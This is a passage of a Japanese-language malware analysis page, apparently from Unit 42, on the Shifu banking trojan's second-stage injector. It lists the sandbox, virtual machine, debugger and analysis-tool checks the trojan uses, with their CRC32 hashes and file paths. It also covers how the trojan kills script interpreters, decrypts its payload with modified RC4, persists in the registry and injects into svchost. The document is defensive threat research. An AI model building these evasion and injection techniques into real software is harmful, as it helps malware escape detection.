class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23099 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png\" alt=\"\u56f33 \u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u306b\u304a\u3051\u308bShifu atom\" width=\"742\" height=\"438\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png 742w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3-300x177.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3-370x218.png 370w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/a><figcaption id=\"caption-attachment-23099\" class=\"wp-caption-text\">\u56f33 \u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u306b\u304a\u3051\u308bShifu atom<\/figcaption><\/figure>\n<h4>\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570<\/h4>\n<p 
style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f2\u3064\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30d1\u30e9\u30e1\u30fc\u30bf\u304c\u5b58\u5728\u3057\u307e\u3059\u304c\u3001\u305d\u306e\u3046\u3061\u306e1\u3064\u306e\u307f\u304c\u6a5f\u80fd\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306f\u5c06\u6765\u306e\u6a5f\u80fd\u3067\u4f7f\u7528\u3055\u308c\u308b\u30d1\u30e9\u30e1\u30fc\u30bf\u304b\u3001\u524a\u9664\u3057\u5fd8\u308c\u305f\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u2013crypt-test<\/p>\n<p style=\"font-weight: 400; padding-left: 80px;\">[It work\u2019s!(\u6a5f\u80fd\u3057\u307e\u3059)]\u3068\u3044\u3046\u30c6\u30ad\u30b9\u30c8\u306e\u30e1\u30c3\u30bb\u30fc\u30b8 \u30dc\u30c3\u30af\u30b9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u2013vm-test<\/p>\n<p style=\"font-weight: 400; padding-left: 80px;\">\u6a5f\u80fd\u306f\u3042\u308a\u307e\u305b\u3093\u3002<\/p>\n<h4>\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af<\/h4>\n<h5>Sandboxie \/ Avast\u56de\u907f<\/h5>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9\u7a7a\u9593\u306bsnxhk.dll (Avast)\u30e2\u30b8\u30e5\u30fc\u30eb\u307e\u305f\u306fsbiedll.dll (Sandboxie)\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u305f\u3081\u306b\u3001GetModuleHandleA()\u3092\u547c\u3073\u51fa\u3057\u3066\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u3001\u30cf\u30f3\u30c9\u30eb\u304c\u8fd4\u3055\u308c\u308b\u304b\u3069\u3046\u304b\u3092\u8abf\u3079\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 
400;\">\u6b21\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af\u306f\u3044\u305a\u308c\u3082\u3001Shifu\u304c32\u30d3\u30c3\u30c8\u306eWindows\u30de\u30b7\u30f3(Wow64\u30d7\u30ed\u30bb\u30b9\u3067\u306f\u306a\u3044)\u3067\u5b9f\u884c\u3055\u308c\u308b\u5834\u5408\u306b\u306e\u307f\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002<\/p>\n<h5>\u30d7\u30ed\u30bb\u30b9\u540d\u306e\u691c\u51fa<\/h5>\n<p style=\"font-weight: 400;\">\u5b9f\u884c\u4e2d\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u3092\u5217\u6319\u3057\u3066\u304b\u3089\u5c0f\u6587\u5b57\u306b\u5909\u63db\u3057\u3001\u3053\u308c\u3089\u306e\u540d\u524d\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3057\u3066\u3001\u6b21\u306e\u30ea\u30b9\u30c8\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0x99DD4432 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x1F413C1F \u2013 vmwaretray.exe<\/li>\n<li style=\"font-weight: 400;\">0x6D3323D9 \u2013 vmusrvc.exe<\/li>\n<li style=\"font-weight: 400;\">0x3BFFF885 \u2013 vmsrvc.exe<\/li>\n<li style=\"font-weight: 400;\">0x64340DCE \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x63C54474 \u2013 vboxtray.exe<\/li>\n<li style=\"font-weight: 400;\">0x2B05B17D \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xF725433E \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x77AE10F7 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xCE7D304E \u2013 dumpcap.exe<\/li>\n<li style=\"font-weight: 400;\">0xAF2015F2 \u2013 ollydbg.exe<\/li>\n<li style=\"font-weight: 400;\">0x31FD677C \u2013 importrec.exe<\/li>\n<li style=\"font-weight: 400;\">0x6E9AD238 \u2013 petools.exe<\/li>\n<li style=\"font-weight: 400;\">0xE90ACC42 \u2013 idag.exe<\/li>\n<li style=\"font-weight: 400;\">0x4231F0AD \u2013 sysanalyzer.exe<\/li>\n<li style=\"font-weight: 400;\">0xD20981E0 \u2013 sniff_hit.exe<\/li>\n<li style=\"font-weight: 400;\">0xCCEA165E \u2013 scktool.exe<\/li>\n<li style=\"font-weight: 400;\">0xFCA978AC \u2013 proc_analyzer.exe<\/li>\n<li style=\"font-weight: 
400;\">0x46FA37FB \u2013 hookexplorer.exe<\/li>\n<li style=\"font-weight: 400;\">0xEEBF618A \u2013 multi_pot.exe<\/li>\n<li style=\"font-weight: 400;\">0x06AAAE60 \u2013 idaq.exe<\/li>\n<li style=\"font-weight: 400;\">0x5BA9B1FE \u2013 procmon.exe<\/li>\n<li style=\"font-weight: 400;\">0x3CE2BEF3 \u2013 regmon.exe<\/li>\n<li style=\"font-weight: 400;\">0xA945E459 \u2013 procexp.exe<\/li>\n<li style=\"font-weight: 400;\">0x877A154B \u2013 peid.exe<\/li>\n<li style=\"font-weight: 400;\">0x33495995 \u2013 autoruns.exe<\/li>\n<li style=\"font-weight: 400;\">0x68684B33 \u2013 autorunsc.exe<\/li>\n<li style=\"font-weight: 400;\">0xB4364A7A \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x9305F80D \u2013 imul.exe<\/li>\n<li style=\"font-weight: 400;\">0xC4AAED42 \u2013 emul.exe<\/li>\n<li style=\"font-weight: 400;\">0x14078D5B \u2013 apispy.exe<\/li>\n<li style=\"font-weight: 400;\">0x7E3DF4F6 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0xD3B48D5B \u2013 hookanaapp.exe<\/li>\n<li style=\"font-weight: 400;\">0x332FD095 \u2013 fortitracer.exe<\/li>\n<li style=\"font-weight: 400;\">0x2D6A6921 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x2AAA273B \u2013 joeboxserver.exe<\/li>\n<li style=\"font-weight: 400;\">0x777BE06C \u2013 joeboxcontrol.exe<\/li>\n<li style=\"font-weight: 400;\">0x954B35E8 \u2013 ?<\/li>\n<li style=\"font-weight: 400;\">0x870E13A2 \u2013 ?<\/li>\n<\/ul>\n<h4>\u30d5\u30a1\u30a4\u30eb\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">\u6b21\u306e\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u30d5\u30a9\u30eb\u30c0\u304c\u30b7\u30b9\u30c6\u30e0\u306b\u5b58\u5728\u3059\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3001\u5b58\u5728\u3059\u308b\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">c:\\sample\\pos.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\analysis\\sandboxstarter.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\analysis<\/li>\n<li 
style=\"font-weight: 400;\">c:\\insidetm<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vmmouse.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vmhgfs.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\windows\\system32\\drivers\\vboxmouse.sys<\/li>\n<li style=\"font-weight: 400;\">c:\\iDEFENSE<\/li>\n<li style=\"font-weight: 400;\">c:\\popupkiller.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\tools\\execute.exe<\/li>\n<li style=\"font-weight: 400;\">c:\\Perl<\/li>\n<li style=\"font-weight: 400;\">c:\\Python27<\/li>\n<\/ul>\n<h4>\u30c7\u30d0\u30c3\u30ac\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">IsDebuggerPresent()\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067\u3001\u30c7\u30d0\u30c3\u30b0\u4e2d\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u307e\u305f\u3001ProcessDebugPort\u304a\u3088\u3073ProcessDebugObjectHandle\u3092\u6307\u5b9a\u3057\u3066ZwQueryInformationProcess()\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067\u3001\u30c7\u30d0\u30c3\u30ac\u306e\u5b58\u5728\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u30c7\u30d0\u30c3\u30ac\u304c\u691c\u51fa\u3055\u308c\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>Wireshark\u306e\u691c\u51fa<\/h4>\n<p style=\"font-weight: 400;\">CreateFile()\u3092\u4f7f\u7528\u3057\u3066\\\\.\\NPF_NdisWanIp\u306e\u30aa\u30fc\u30d7\u30f3\u3092\u8a66\u307f\u3001\u30aa\u30fc\u30d7\u30f3\u306b\u6210\u529f\u3057\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u306b\u5165\u308a\u307e\u3059\u3002<\/p>\n<h4>\u81ea\u5df1\u30b5\u30cb\u30c6\u30a3 \u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 
400;\">\u81ea\u8eab\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u9577\u3055\u304c30\u6587\u5b57\u3092\u8d85\u3048\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u8d85\u3048\u3066\u3044\u308b\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u307e\u305f\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u304c\u3001\u6b21\u306e\u3044\u305a\u308c\u304b\u306b\u4e00\u81f4\u3059\u308b\u304b\u3069\u3046\u304b\u3082\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li>0xE84126B8 \u2013 sample.exe<\/li>\n<li>0x0A84E285 \u2013 ?<\/li>\n<li>0x3C164BED \u2013 ?<\/li>\n<li>0xC19DADCE \u2013 ?<\/li>\n<li>0xA07ACEDD \u2013 ?<\/li>\n<li>0xD254F323 \u2013 ?<\/li>\n<li>0xF3C4E556 \u2013 ?<\/li>\n<li>0xF8782263 \u2013 ?<\/li>\n<li>0xCA96016D \u2013 ?<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3055\u3089\u306b\u3001GFI\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u5185\u306b\u3042\u308b\u6b21\u306e\u3044\u305a\u308c\u304b\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u3001\u81ea\u8eab\u306e\u30d7\u30ed\u30bb\u30b9 \u30a2\u30c9\u30ec\u30b9\u7a7a\u9593\u306b\u5b58\u5728\u3059\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">api_log.dll<\/li>\n<li style=\"font-weight: 400;\">dir_watch.dll<\/li>\n<li style=\"font-weight: 400;\">pstorec.dll<\/li>\n<\/ul>\n<h4>\u672a\u77e5\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af<\/h4>\n<p style=\"font-weight: 
400;\">Shifu\u306f\u3001\u76ee\u7684\u304c\u4e0d\u660e\u306e\u5206\u6790\u56de\u907f\u30c8\u30ea\u30c3\u30af\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002Process32NextW()\u306e\u30a2\u30c9\u30ec\u30b9\u304c\u53d6\u5f97\u3055\u308c\u3001\u305d\u306e\u6700\u521d\u306e5\u30d0\u30a4\u30c8\u304c\u30b7\u30fc\u30b1\u30f3\u30b90x33C0C20800\u3068\u6bd4\u8f03\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u9006\u30a2\u30bb\u30f3\u30d6\u30eb\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">33C0\u00a0\u00a0XOR EAX,EAX\r\nC2 0800   RETN 8\r\n<\/pre>\n<p style=\"font-weight: 400;\">\u3053\u306e\u30b3\u30fc\u30c9\u306f32\u30d3\u30c3\u30c8\u306eWindows XP\u306b\u5b58\u5728\u3057\u3001\u305d\u308c\u3088\u308a\u5f8c\u306eWindows\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u305d\u306e\u95a2\u6570\u306eUnicode\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u307e\u3060\u5b9f\u88c5\u3055\u308c\u3066\u3044\u306a\u3044\u53ef\u80fd\u6027\u304c\u3042\u308b\u305f\u3081\u3067\u3059\u3002\u3053\u306e\u30b3\u30fc\u30c9 \u30b7\u30fc\u30b1\u30f3\u30b9\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001Shifu\u304c32\u30d3\u30c3\u30c8\u306eWindows 
XP\u3067\u5b9f\u884c\u3055\u308c\u305f\u3053\u3068\u3092\u610f\u5473\u3057\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<h4>Windows\u30c9\u30e1\u30a4\u30f3\u540d\u306e\u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">API\u95a2\u6570NetServerGetInfo()\u304a\u3088\u3073NetWkstaGetInfo()\u3092\u4f7f\u7528\u3057\u3066\u3001\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u30ef\u30fc\u30af\u30b0\u30eb\u30fc\u30d7\u540d\u304c\u201cWORKGROUP\u201d\u307e\u305f\u306f\u201cHOME\u201d\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3001\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u306f\u3001\u7121\u9650\u306eSleep()\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u6b21\u306b\u3001\u201cANALYSERS\u201d\u3068\u3044\u3046\u540d\u524d\u3092\u63a2\u3057\u3001\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u7121\u9650\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3068\u30e6\u30fc\u30b6\u30fc\u540d\u306e\u30c1\u30a7\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">GetComputerName()\u304a\u3088\u3073GetUserName()\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3068\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u53d6\u5f97\u3057\u3001\u6b21\u306e\u6587\u5b57\u5217\u3092\u63a2\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">SANDBOX<\/li>\n<li style=\"font-weight: 400;\">FORTINET<\/li>\n<li style=\"font-weight: 400;\">VIRUS<\/li>\n<li style=\"font-weight: 400;\">MALWARE<\/li>\n<li style=\"font-weight: 400;\">MALNETVM<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3044\u305a\u308c\u304b\u306e\u6587\u5b57\u5217\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001\u7121\u9650\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30d7\u30ed\u30bb\u30b9\u7d42\u4e86\u6a5f\u80fd<\/h4>\n<p style=\"font-weight: 
400;\">Shifu\u306e\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5b9f\u884c\u4e2d\u306e\u3059\u3079\u3066\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u5217\u6319\u3057\u3066\u304b\u3089\u305d\u308c\u305e\u308c\u306e\u540d\u524d\u3092\u5c0f\u6587\u5b57\u306b\u5909\u63db\u3057\u3001\u305d\u308c\u3089\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3057\u3066\u3001\u6b21\u306e\u3082\u306e\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xD2EFC6C4 \u2013 python.exe<\/li>\n<li style=\"font-weight: 400;\">0xE185BD8C \u2013 pythonw.exe<\/li>\n<li style=\"font-weight: 400;\">0xDE1BACD2 \u2013 perl.exe<\/li>\n<li style=\"font-weight: 400;\">0xF2EAA55E \u2013 autoit3.exe<\/li>\n<li style=\"font-weight: 400;\">0xB8BED542 \u2013 ?<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u4e00\u81f4\u3059\u308b\u3082\u306e\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001OpenProcess()\u3068TerminateProcess()\u3092\u4f7f\u7528\u3057\u3066\u3001\u30d7\u30ed\u30bb\u30b9\u3092\u307e\u305a\u7d42\u4e86\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u7d42\u4e86\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u3001ZwClose()\u306eHANDLE_FLAG_PROTECT_FROM_CLOSE\u304c\u30d5\u30e9\u30b0\u4ed8\u3051\u3055\u308c\u3066\u3044\u308b\u3068\u304d\u306f\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u30e1\u30a4\u30f3 \u30a6\u30a3\u30f3\u30c9\u30a6 \u30cf\u30f3\u30c9\u30eb\u3092\u9589\u3058\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u5b8c\u5168\u306a\u30a2\u30af\u30bb\u30b9\u6a29\u9650\u3067\u30d7\u30ed\u30bb\u30b9\u3092\u958b\u304d\u3001ZwUnmapViewOfSection()\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u30e1\u30e2\u30ea\u304b\u3089\u30de\u30c3\u30d7\u89e3\u9664\u3057\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30de\u30c3\u30d7\u89e3\u9664\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306e\u30e1\u30a4\u30f3 \u30a6\u30a3\u30f3\u30c9\u30a6 
\u30cf\u30f3\u30c9\u30eb\u3092\u9589\u3058\u307e\u3059\u3002<\/p>\n<h4>\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5fa9\u53f7\u5316\u3001\u89e3\u51cd\u304a\u3088\u3073\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5fa9\u53f7\u5316\u3059\u308b\u305f\u3081\u306b\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5fa9\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3067\u5fc5\u8981\u3068\u3055\u308c\u308bsalt\u5024\u3092.rsrc\u30bb\u30af\u30b7\u30e7\u30f3\u304b\u3089\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u6539\u5909\u3055\u308c\u305fRC4\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3067\u306f\u3001salt\u5024\u3092\u4f7f\u7528\u3057\u3066\u3001\u5148\u982d\u30d0\u30a4\u30c8\u306b\u5f8c\u7d9a\u3059\u308b256\u30d0\u30a4\u30c8\u306e\u914d\u5217\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u6697\u53f7\u5316\u3055\u308c\u305f\u914d\u5217\u3092\u4f7f\u7528\u3057\u3066\u3001.tls\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306e\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001aPLib\u5727\u7e2e\u30e9\u30a4\u30d6\u30e9\u30ea\u3068\u4e00\u7dd2\u306b\u5727\u7e2e\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 
400;\">\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u304c\u4e2d\u9ad8\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u306e\u30d7\u30ed\u30bb\u30b9\u3068\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u5834\u5408\u3001atom\u6587\u5b57\u5217\u540d\u3092\u8a08\u7b97\u3059\u308b\u30eb\u30fc\u30c1\u30f3\u304c\u518d\u5ea6\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u4eca\u56de\u306f\u3001\u201cae000000\u201d\u306a\u3069\u306e\u6587\u5b57\u5217\u3092\u69cb\u7bc9\u3059\u308b\u306e\u306b\u6700\u521d\u306e4\u30d0\u30a4\u30c8\u306e\u307f\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001\u3053\u306e\u6587\u5b57\u5217\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u304c\u8a08\u7b97\u3055\u308c\u30010x0\u304b\u30890xFF\u306e\u7bc4\u56f2\u5185\u306b\u3042\u308b\u3001256\u30d0\u30a4\u30c8\u306e\u5225\u306e\u914d\u5217\u3068\u306eXOR\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u914d\u5217\u304c\u3001\u5fa9\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u518d\u6697\u53f7\u5316\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u751f\u6210\u3055\u308c\u305f\u6697\u53f7\u5316\u30c7\u30fc\u30bf\u306f\u3001\u6301\u7d9a\u6027\u306e\u305f\u3081\u306b\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u305d\u306e\u969b\u306b\u306f\u3001\u201cHKCU\\software\\microsoft\\windows\u201d\u30ad\u30fc\u306e\u4e0b\u306e\u30e9\u30f3\u30c0\u30e0\u306aCRC32\u30cf\u30c3\u30b7\u30e5\u540d(\u4f8b: \u201cf4e64d63\u201d)\u3068\u3057\u3066\u8ffd\u52a0\u3055\u308c\u307e\u3059\u3002\u307e\u305f\u3001\u6587\u5b57\u5217\u201cae000000\u201d\u3092\u540d\u524d\u3068\u3059\u308b2\u756a\u76ee\u306e\u5024\u304c\u4f5c\u6210\u3055\u308c\u3001null\u30d0\u30a4\u30c8\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u3078\u306e\u30d1\u30b9(\u4f8b: 
\u201cC:\\ProgramData\\7d5d6044.exe\u201d)\u3067\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u4e00\u6642\u7684\u306b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u518d\u5ea6\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23096\" aria-describedby=\"caption-attachment-23096\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23096 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png\" alt=\"\u56f34Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc \u30d1\u30b9\" width=\"945\" height=\"464\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-900x442.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-300x147.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-768x377.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_4-370x182.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23096\" class=\"wp-caption-text\">\u56f34Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3068\u521d\u671f\u30ed\u30fc\u30c0\u30fc \u30d1\u30b9<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30e1\u30e2\u30ea\u5185\u3067\u89e3\u51cd\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u4e2d\u65ad\u72b6\u614b\u306esvchost.exe\u30d7\u30ed\u30bb\u30b9(x86)\u304c\u3001\u89aa\u30d7\u30ed\u30bb\u30b9\u3068\u540c\u3058\u6574\u5408\u6027\u30ec\u30d9\u30eb\u3067\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30d7\u30ed\u30bb\u30b9\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u3001PE\u30de\u30b8\u30c3\u30af\u5024(MZ)\u304c\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002svchost\u30d7\u30ed\u30bb\u30b9\u304c\u518d\u958b\u3055\u308c\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30d0\u30c3\u30c1 